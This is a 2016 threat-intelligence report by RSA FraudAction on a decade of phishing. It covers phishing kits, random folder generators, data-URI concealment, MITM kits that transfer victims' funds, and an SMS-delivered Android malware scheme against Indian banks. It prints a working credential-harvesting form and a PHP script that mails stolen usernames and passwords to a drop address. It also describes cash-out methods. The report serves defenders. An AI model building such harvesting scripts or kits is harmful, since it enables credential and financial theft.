A DECADE OF PHISHING

RSA FraudAction Intelligence

A DECADE OF PHISHING November 2016

2

TABLE OF CONTENTS

Introduction ............................................................................................................ 3

How to Set up a Phishing Campaign ........................................................................... 3

Fundamentals ....................................................................................................... 3

How Does Phishing Work in the Real World? ............................................................. 4

Motivation - How Do fraudsters Cash Out? ............................................................... 5

The Many Schemes and Techniques of Phishing ........................................................... 5

The Tax Refund Ploy - Multi-branded Phishing .......................................................... 5

Bulk Phishing Campaigns ....................................................................................... 5

Random Folder Generators ..................................................................................... 6

Local HTML Scheme .............................................................................................. 8

BASE64 encoded Phishing in a URL ......................................................................... 9

Phishing with MITM capabilities ............................................................................... 9

Phishing Plus Mobile Malware in India .................................................................... 12

Fast-Flux Phishing ............................................................................................... 15

Additional Phishing Techniques ............................................................................. 16

3

INTRODUCTION

Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have

investigated, and also explains the techniques and inner workings of some recently seen schemes.

HOW TO SET UP A PHISHING CAMPAIGN

There is nothing complicated about setting up a phishing campaign. Phishing sites, like any

website, require a hosting facility (domain, IP address, etc.) as well as a software ‘front-end’ and

‘back-end’ (HTML, PHP etc.). Anyone with a little knowledge in web-development can set up a

phishing site without a hassle. Simple phishing sites are generally simple copies of legitimate

customer login pages (front-end), where the action script (that handles the submitted

information) is different from the legitimate one. Owing to this simplicity in the preparation

process, phishing was, is, and will probably remain one of the most desirable scam techniques

performed by fraudsters.

FUNDAMENTALS

What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the

help of additional client-side scripting/markup languages such as JavaScript and CSS. These

components are responsible for presenting text, pictures, and other graphics. In addition, PHP

(Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to

perform programming tasks, and fraudsters love it! PHP is a relatively simple to write server-side

scripting language, and it is used by most websites today.

In every phishing site, there is an information form that victims are prompted to fill with

requested details. In HTML, forms are composed like the following example:

<form method=”POST” action=”getdata.php”>

Username: <input type=”text” name=”username” /> <br/>

Password: <input type=”password” name=”password” /> <br/><br/>

<input type=”submit” value=”Login” />

</form>

The example login form above contains two data fields: Username and Password, defined by the

input tag. The third input has a type defined as submit with a value defined as Login – this means

that it will appear on the login screen as a submit button labeled Login. The form tags at the

beginning and end of the script define a form with these fields. The form tag attributes method

and action determine how the data is going to be handled when victim clicks the Login button –

the data will be submitted to the getdata.php handling script via an HTTP POST request.

How do fraudsters usually prepare all of the above? They copy the HTML source code of a

legitimate site’s pages, and change the action attribute to a script they’ve written (usually in

PHP). The easy method is just to get the submitted data and forward it to fraudster’s email

address (a.k.a. the drop email). Here’s an example of a getdata.php script:

<?php

$username = $_POST[‘username’];

$password = $_POST[‘password’];

4

$message = “-----[Best HaXoR Ever]-----\n”;

$message .= “Username: $username\n”;

$message .= “Password: $password\n”;

$message .= “-----[Best HaXoR Ever]-----\n”;

$subject = “Phished data”;

mail(“[email protected]”, $subject, $message);

?>

Although most phishing sites still work in this simplified manner, during the last decade we’ve

seen more advanced phishing techniques develop and evolve.

HOW DOES PHISHING WORK IN THE REAL WORLD?

Being a simple way to do fraud, phishing usually doesn’t attract sophisticated threat actors. In

some cases, they don’t even possess any programming knowledge. Phishing sites are commonly

distributed in underground forums as ‘kits’ packaged as archive files (ZIP, RAR, etc.) that contain

all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop

emails in the relevant files of the kit. It is very comfortable and easy for them to use. However,

distributors or kit developers don’t spend their precious time just to make their ‘clients’ the

fraudsters happy. Many of the kits we have investigated contain hidden or obfuscated code that

forwards the stolen data back to the kit’s author as well as to the end-user fraudster. So, for

example, if 100 fraudsters use these ‘infected’ kits distributed by single kit author, he stands to

harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online

100 times himself.

Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to

make it available online. Here are two commonly used options for deployment:

Use a hacked website

Buy a site/domain

The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either

hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of

such a site provides the fraudster with a link to a ‘backdoor’ script (also in PHP) also known as a

shell that allows them to control and manage the site, uploading and deploying the phishing kit

resources.

When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to

distribute it to potential victims. Distribution of phishing URLs is commonly performed via email

messages. However, occasionally fraudsters can be more creative and use additional distribution

vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of email

addresses are traded and sold in underground forums, and often the price depends on how good

that list is. For example, how close a match there is between the email addresses of people from a

geographic area that matches the targeted entity, and how many of them are active or online, can

affect the price. If fraudster is targeting a British bank, a verified active email address owned by

British citizens will fetch a higher price.

5

MOTIVATION - HOW DO FRAUDSTERS CASH OUT?

Not every financial institution becomes a fraudster’s target. The main qualifying factor is either a

security flaw in the target site, and/or the ease of cashing out or monetizing the phishing process.

For example, knowing that phishing for PII (Personally Identifiable Information) data such as

mother’s maiden name and date of birth tied together with other personal details can help in

transferring money from a victim’s account elsewhere - will definitely draw a scammer’s attention.

Another option is fraudsters selling stolen data in the underground rather than trying to cash-out

the scam by themselves. This also offers the advantage of avoiding drawing attention from law

enforcement authorities and company security departments. The buyers are usually people who

are well versed with how to cash-out, and are also willing to take on the risks involved. One more

option is fraudsters collaborating with ‘money-mules’. The money is transferred to a ‘mule’

account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to

an ATM, draw the stolen money, and transfer it back to the first fraudster via a money

transferring service (Western Union, MoneyGram etc.). Another cashout scheme is purchasing

various products online using stolen credentials, and then re-selling the items. These are just few

examples of common cashout techniques.

THE MANY SCHEMES AND TECHNIQUES OF PHISHING

THE TAX REFUND PLOY - MULTI-BRANDED PHISHING

One phishing scam that Phishers love to use is to bait victims with a supposed tax refund

notification via email - pretending to come from an official government tax/revenue service in

different countries. When victims follow the link, they see a phishing website that has the same

look and feel of the legitimate revenue service site of their country, with a list of all the banks in

that region. The victim is prompted to select their bank and enter personal information to receive

a refund. This ploy enables fraudsters to steal data from customers at several banks at once and

increase their fraud coverage.

BULK PHISHING CAMPAIGNS

Another popular trend is performing phishing campaigns in bulk form. This means that rather than

deploying a single phishing website that is eventually sent to victims, fraudsters deploy them in

bulk, and distribute URLs randomly among phishing emails. This tactic increases the phishing

site’s lifespan and makes the detection and shutdown process a bit harder. Contrary to a usual

phishing site where the scammers use one or two hijacked websites to deploy a phishing kit, the

bulk scheme could encompass dozens of hijacked websites with several phishing directories on

each one, resulting in hundreds of phishing websites. For example:

http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/hkj3k7/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/57askv/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/loinc2/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/4jvrgr/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/mnjnde/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/hm37lj/phishing_site/login.html

6

http://examplesite1.com/pathtobulkphish/oxk2hl/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/1be0lv/phishing_site/login.html

http://examplesite1.com/pathtobulkphish/cmq8wz/phishing_site/login.html

.

.

.






.

.

.






.

.

.

Detecting one or two of these URLs and shutting them down can still leave other URLs online. The

randomly generated folder names in these phishing URLs makes them much harder to detect.

Needless to say, when fraudsters host the phishing attacks on domains that they bought, it

complicates the handling of such attacks as there is little or no cooperation from domain

registrants in trying to shut down phishing sites. On the other hand, hijacked website registrants

are often more willing to cooperate and cease the abuse of their websites. These phishing

campaigns are often orchestrated by several threat actors.

RANDOM FOLDER GENERATORS

Some of the newer phishing kits have been observed to generate a new randomized phishing URI

for each new victim accessing the primary phishing link. The victims receive a link (by email or

another distribution method) the redirects them to a folder-generating script. Once the victim

accesses the link, a fresh (URI) folder is generated on the fly, resulting in a ‘personal’ phishing

site dedicated to this instance and this victim. The folders are usually named with a random

sequence of characters, often using the IP address or email address of the victim. In some cases,

the entire folder is deleted as soon as the victim completes entering all of the requested personal

information, and the data is sent off to a phishing drop site or email address.

7

Here is a generic example - the initial link in the phishing email looks like this:

http://somesite.net/folder1/folder2/index.php

The PHP code in the snapshot below is an example of a random folder-generating script.

index.php is a PHP script that creates a random folder and copies all the required resource files

from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In

some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive

sitting in the ‘base’ directory of the phishing campaign, and deploys them as is, using the name of

the archive folder.

Random name

generating function

Randomize the name

some more Logging every access in

file including IP, date, and

browser type

File copying function

Base directory - contents are copied from here

Copy the contents to generated folder and redirect to it

Phishing email • Victim follows a folder-generating URL

Folder-generating

script

• New randomly-named folder is generated • Required files are copied from base directory to

new folder • Victim is redirected to newly generated URL

Newly generated

folder

• Phishing site is presented to victim

8

This scheme is simple to operate, but it complicates detection and shutdown efforts much like

other schemes described here. When one randomly deployed phishing URL is detected, it might be

deleted in minutes, which can mislead security personnel into thinking that the site has been

brought down. In actual fact, the site remains active and online, simply waiting for a new victim

to access the initial link. In order to handle these cases effectively, it is crucial to detect and

shutdown the ‘base’ directory (or archive) that contains initial phishing site and resources.

LOCAL HTML SCHEME

The phishing scheme that is commonly called ‘Local HTML’ involves an HTML file that is attached

to an email message. Victims are prompted to open it and fill out their personal data. The

phishing site contents are placed in a single HTML file (except for the data handling script and

drop point URL that are incorporated in the form tag action attribute described earlier). The script

can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website.

In both cases, the data is usually sent to the fraudster’s drop email.

Below is a snapshot of Part of a Local HTML contents (form) with a remote drop point URL

From a cyber-security perspective, it may be difficult to shut-down the site when the drop script is

hosted on a hijacked website, as it doesn’t present any abusive content when it is viewed (a blank

page is normally displayed), causing hosting facilities to think it is offline. On the other hand,

online form services are more cooperative in shutting down fraudster accounts.

9

BASE64 ENCODED PHISHING IN A URL

Most major browsers today support a feature called data URI scheme. This feature enables

encoding the webpage content with BASE64 encoding into a string seen in browser address bar.

Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in

regular online hosted phishing. When hosted online, it helps scammers to conceal the main

phishing URL. The data URI is injected into the address bar using the JavaScript’s window.location

property or the HTML meta-refresh.

The screenshot below shows the data URI as it appears in address bar.

This is an example of the script for injecting the data URI into the browser address bar.

PHISHING WITH MITM CAPABILITIES

Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most,

and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that

while the victim is interacting with a phishing site, behind the scenes and not visible to the victim,

the phishing site communicates with and performs actions on the legitimate site. This capability is

implemented with PHP cURL module. The cURL is used to transfer data through various protocols

including HTTP. To develop a script that imitates the user’s actions on a legitimate site, some

reverse engineering is required on the part of the fraudster to understand which requests and

data are forwarded to the legitimate site.

10

Below is a code sample illustrating the cURL object used for communicating with the legitimate

online-banking site.

The script in the snapshot below is a cURL class used for communicating with the legitimate online

banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080).

11

The config.php in the snapshot below contains the fraudster’s account used to receive the stolen

funds transfer.

Another part of the phishing script, seen below, uses the cURL object to transfer funds from the

victim’s account to the fraudster’s account ($cuenta_destino is defined in the config.php shown

above)

The MITM phishing scheme offers a fraudster many advantages – the fraudster can:

Login to the legitimate site to check the validity of stolen credentials

Browse the victim’s account after login to view the account balance

Grab additional personal information such as phone number, address, etc.

In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing

site’s original IP address and use the desired country IP to match that of the victim’s locale. This

results in a low profile in fraud monitoring system logs that flag suspicious activity if actions

carried out on the legitimate site are detected as originating from a region other than the

customer’s or the financial institution’s website locale. Moreover, there are cases where the

phishing kit checked the victim’s account balance, and when it was higher than a given amount, it

transferred the funds to a ‘mule’ account at the same bank through the legitimate site.

These kits/phishing sites are relatively rare as they require higher level coding skills and reverse

engineering of the legitimate websites.

In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario,

the funds in the account are transferred out almost instantly, making it a very serious threat in

cyber-space.

12

PHISHING PLUS MOBILE MALWARE IN INDIA

Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The

Tax Refund scheme described earlier, that operates via a spoofed government revenue service

site, was recently modified to include an SMS message sent to the victim’s phone at the end of

the phishing process. The SMS contains a link that downloads and deploys a malicious APK

(Android mobile malware archive).

This new ploy makes use of a number of schemes and techniques described earlier, including a

random folder generator, BASE64 data URI, tax-refund scheme, and more. The link provided in

the phishing emails leads victims to a redirection URL (performed via the BASE64 data URI). That

URL leads to an outer-frame site, using a script that communicates with a remote SQL database

to retrieve the inner-frame URL.

Phishing email

•Victim clicks on redirection link

Redirection

•Victim is redirected to outer-frame URL

•The redirecting source-code is obfuscated with Unescape

•Redirecting code executes using data URI

Outer-frame

•Communicates with SQL database to get inner-frame URL

•Presents inner-frame hosted on URL different from outer-frame

Inner-frame (folder-

genarator)

•Randomly named folder is generated in random parent directory

•Victim is redirected to a new folder

Phishing site

•Victim is prompted to select a bank

•Victim is prompted to enter personal data including phone number

•Compromised data is sent to remote drop URL

Victim receives

short-URL link via SMS

•The link leads to URL for downloading malicious Andoid application

•Once APK is installed, victim's data on smartphone iscompromised

13

The snapshot below shows part of the outer-frame code – communicating with a remote SQL

database.

The inner-frame phishing URL generates a random folder in a random parent directory, which is

different from the usual folder-generators that create a new folder under the same path. The

phishing site prompts the victims to choose their bank from a long list of Indian banks to begin

the ‘tax-refund’ process. The image below shows the bank selection screen in the phishing site.

14

The kit uses a configuration file containing URLs for the resources needed by the phishing site:

A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing

the images from the legitimate site which can trigger detection

A drop URL that receives and logs stolen data

A URL with the SMS sending script for the malicious APK

A short URL that is sent to victims

The last page file that victims see at the end of the phishing process

The code snapshot below is an example of the phishing site configuration file.

Once the victim finishes going through all the phishing pages, the folder is deleted. To add further

spice to this scheme, upon entering their phone number in this site, the victim receives an SMS

message with a link prompting the download of a malicious APK file (Android application) under

the pretense of ‘mobile verification’.

The random URL generation where links are deleted and created per victim complicates detection

and shut-down by cyber security services. The impact of this trend is beyond ‘regular’ phishing,

since at the end of the process, the victim’s phone is infected by a malicious application. That

mobile malware application keeps on stealing data from the phone long after the personal data

has been phished via a simple phishing site. Since many banks today employ two-factor

authentication using SMS messages for online banking, this malicious app can be even more

harmful – allowing the fraudster control over the phone and the second channel for

authentication.

15

FAST-FLUX PHISHING

One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated

are commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late).

These are usually phishing sites hosted on Fast-Flux networks – phishing attack domains that are

hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in

order to bring down these attacks, our analysts can only contact the registrars, as contacting the

ISP/Hosting would not help to get to the root problem. Domains are often generated automatically

in this scheme for the sole purpose of hosting phishing and malware. Each domain contained

dozens of URLs targeting several entities, making campaigns very profitable for the scam authors.

Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets –

many infected ‘zombie’ computers. It involves a DNS with short TTL of its records in order to

achieve IP addresses randomization.

This scheme is not as common recently as it was in the past.

16

ADDITIONAL PHISHING TECHNIQUES

In addition to the more notable and prevalent phishing schemes we have described, there are a

few more techniques that are available in the phishing arsenal that are not as well known, but are

still out there and are worth noting.

Filtering by Geolocation and Email Address

Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance,

our analysts have witnessed phishing sites that validate their victims by comparing their email

address with a long list of confirmed email addresses for a certain region that the fraudster

obtained earlier. Some phishing emails are sent with email addresses embedded in the URL’s

parameters to make sure that only the people who received the phishing email will be able to

access the fraudulent site.

Make sure victim’s email address is

set in “id” parameter, otherwise

phishing won’t be shown

Check whether the email is

in the list

Check whether it is a returning

victim

Put it in ignore list to avoid

access for second time

If it passed the test,

redirect to phishing page

17

Collecting Statistics

Statistics collection is another popular feature fraudsters like to implement in their attacks.

Sometimes, it is done using online services, but most of the time this feature is incorporates as

part of a phishing kit. User information like screen resolution, IP address, language preferences in

the browser, etc. allows fraudsters to mimic a victim’s online “fingerprint” to try and login to their

online accounts, avoiding detection of online-security monitoring solutions deployed in legitimate

websites.

18

The 419 Scam

The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly,

enough people still fall victim to this simple and often humorous fictional cover story that

purportedly offers to share millions of dollars with the victim, if only they first provide a small

deposit to start the process… Now, in order to add greater believability or a trust factor to this

scam, fraudsters developed sites that imitate online banking, where the victims are given a set of

prepared account credentials to login. Usually, their name is displayed after they login, and they

can see that there are thousands or millions of dollars in their account. Once they gain this little

measure of the victim’s trust, the rest of the standard 419 scam can be played out more easily.

Smartphones Always At Our Side

We are now living in the ‘smartphone era’, where all sorts of tiny mobile devices with vast

computing and communication abilities are always at our side – fraudsters take into consideration

that victims are now more ‘attached’ to their email than ever before. Many of us check our

messages much more frequently, especially if we have a notification sound set on our device. And

accordingly, more and more fraudsters modify their phishing sites to accommodate mobile

browsers. Therefore, despite the rising awareness of online fraud in the general population and

the media, phishing remains one of the most dangerous cyber-threats.

www.rsa.com

ABOUT RSA

RSA helps more than 30,000 customers around the world take command of their security posture by partnering to build and

implement business-driven security strategies. With RSA's award-winning cybersecurity solutions, organizations can effectively

detect and respond to advanced attacks; manage user identities and access; and reduce business risk, fraud and cybercrime. For

more information, go to www.rsa.com.

ABOUT RSA FRAUDACTION

RSA FraudAction is a managed threat intelligence service which provides global organizations with 24x7 protection and shutdown

against phishing, malware, rogue mobile apps and other cyber attacks that impact their business. Supported by 150 analysts in

RSA’s Anti-Fraud Command Center, the RSA FraudAction service analyzes millions of potential threats every day and has enabled

the shutdown of more than one million cyber attacks.

EMC2, EMC, the EMC logo, RSA, and the RSA logo, are registered trademarks or trademarks of EMC Corporation in the United States and other countries. VMware is a

registered trademark or trademark of VMware, Inc., in the United States and other jurisdictions. © Copyright 2016 EMC Corporation. All rights reserved. Published in the USA.

http://www.rsa.com/

Documents

A DECADE OF PHISHING